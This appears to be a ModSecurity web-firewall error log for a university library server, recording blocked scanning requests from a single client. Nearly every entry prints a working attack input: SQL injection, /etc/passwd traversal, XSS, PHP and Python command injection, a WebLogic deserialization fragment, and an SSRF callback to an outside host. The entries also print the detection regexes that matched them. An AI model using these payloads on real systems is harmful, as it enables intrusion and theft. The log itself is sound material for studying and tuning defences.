"WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11e8Co-f0AAAVRxdEAAAAQ"]
[Tue Aug 29 11:35:08.359583 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: vaday' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11fMCo-f0AAAT9PQAAAAA1"]
[Tue Aug 29 11:35:09.340274 2023] [:error] [pid 1253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/wechat-broadcast/wechat/Image.php"] [unique_id "ZO11fcCo-f0AAATlLF4AAAAq"]
[Tue Aug 29 11:35:10.335273 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11fsCo-f0AAAUbg14AAABQ"]
[Tue Aug 29 11:35:10.364587 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:s: 1' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11fsCo-f0AAASEJZAAAAAE"]
[Tue Aug 29 11:35:10.373229 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"_fp_. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22_fp_: \\x22_fp_"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/HandleEvent"] [unique_id "ZO11fsCo-f0AAASHh90AAAAD"]
[Tue Aug 29 11:35:12.318577 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11gMCo-f0AAAUJIzoAAABB"]
[Tue Aug 29 11:35:12.369420 2023] [:error] [pid 1242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAATavwEAAAAg"]
[Tue Aug 29 11:35:12.503721 2023] [:error] [pid 1230] [client 143.42.78.27] ModSecurity: Rule 7fe1ce5b6070 [id "981173"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "159"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAATOA-QAAAAH"]
[Tue Aug 29 11:35:12.757444 2023] [:error] [pid 1230] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAATOA-QAAAAH"]
[Tue Aug 29 11:35:13.382822 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO11gcCo-f0AAASHh@QAAAAD"]
[Tue Aug 29 11:35:14.295869 2023] [:error] [pid 1253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO11gsCo-f0AAATlLGcAAAAq"]
[Tue Aug 29 11:35:14.386912 2023] [:error] [pid 1231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/etc/passwd found within TX:1: 0177.0.0.1/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO11gsCo-f0AAATPtUIAAAAM"]
[Tue Aug 29 11:35:16.197532 2023] [:error] [pid 1382] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "digilibft.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11hMCo-f0AAAVmuKgAAAAT"]
[Tue Aug 29 11:35:16.384439 2023] [:error] [pid 1387] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventDatayv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9Jbn..."] [severity "CRITICAL"] [hostname "digilibft.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11hMCo-f0AAAVr@RkAAAAZ"]
[Tue Aug 29 11:35:16.396529 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/passport/index.php"] [unique_id "ZO11hMCo-f0AAAUOaWEAAABG"]
[Tue Aug 29 11:35:16.398277 2023] [:error] [pid 1247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cfg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:cfg: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php"] [unique_id "ZO11hMCo-f0AAATfd5QAAAAk"]
[Tue Aug 29 11:35:18.448971 2023] [:error] [pid 1265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)}} found within ARGS:Language: de{${system(\\x22ls\\x22)}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/mailingupgrade.php"] [unique_id "ZO11hsCo-f0AAATxvZ0AAAAw"]
[Tue Aug 29 11:35:18.524304 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[fullordering]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[fullordering]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11hsCo-f0AAAUOaWUAAABG"]
[Tue Aug 29 11:35:19.303380 2023] [:error] [pid 1391] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO11h8Co-f0AAAVvlG0AAAAe"]
[Tue Aug 29 11:35:20.399189 2023] [:error] [pid 1384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:vars[1][]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:vars[1][]: vars[1][]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO11iMCo-f0AAAVoCAwAAAAY"]
[Tue Aug 29 11:35:21.341319 2023] [:error] [pid 1247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:bwg_tag_id_bwg_thumbnails_0[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:bwg_tag_id_bwg_thumbnails_0[]: )\\x22 union select 1,2,3,4,5,6,7,concat(md5(999999999), 0x2c, 8),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11icCo-f0AAATfd5cAAAAk"]
[Tue Aug 29 11:35:22.337657 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:categories. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ~ found within ARGS:categories: ~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/servlet/codesettree"] [unique_id "ZO11isCo-f0AAATQXkQAAAAO"]
[Tue Aug 29 11:35:23.374850 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:apis. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:apis: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/api/console/api_server"] [unique_id "ZO11i8Co-f0AAATUxT0AAAAW"]
[Tue Aug 29 11:35:24.324032 2023] [:error] [pid 1303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://notburpcollaborator.net found within TX:1: notburpcollaborator.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO11jMCo-f0AAAUXLlYAAABM"]
[Tue Aug 29 11:35:24.336511 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'orQN'='orQN found within ARGS:username: test' AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND 'orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11jMCo-f0AAAUNaokAAABF"]
[Tue Aug 29 11:35:25.335387 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: (SELECT 3 FROM (SELECT SLEEP(7))enz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11jcCo-f0AAATWYUoAAAAa"]
[Tue Aug 29 11:35:26.357043 2023] [:error] [pid 1303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',''); found within ARGS:password: g','');import os;os.system('6563686f20224d6c566b6547744f4e7a464f597a41344e6d51344e477846633278795630644c4f45315022207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574'.decode('hex'))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/webadmin/tools/unixlogin.php"] [unique_id "ZO11jsCo-f0AAAUXLlkAAABM"]
[Tue Aug 29 11:35:27.317953 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:groupsIds[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:groupsIds[]: 1) AND (SELECT 3066 FROM (SELECT(SLEEP(5)))CEHy)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11j8Co-f0AAAShCckAAAAi"]
[Tue Aug 29 11:35:27.323727 2023] [:error] [pid 1354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id[]: 1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11j8Co-f0AAAVK0LYAAAAB"]
[Tue Aug 29 11:35:28.329002 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:username: admin' AND 4719=4719-- GZHh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/banker/index.php"] [unique_id "ZO11kMCo-f0AAAShCcsAAAAi"]
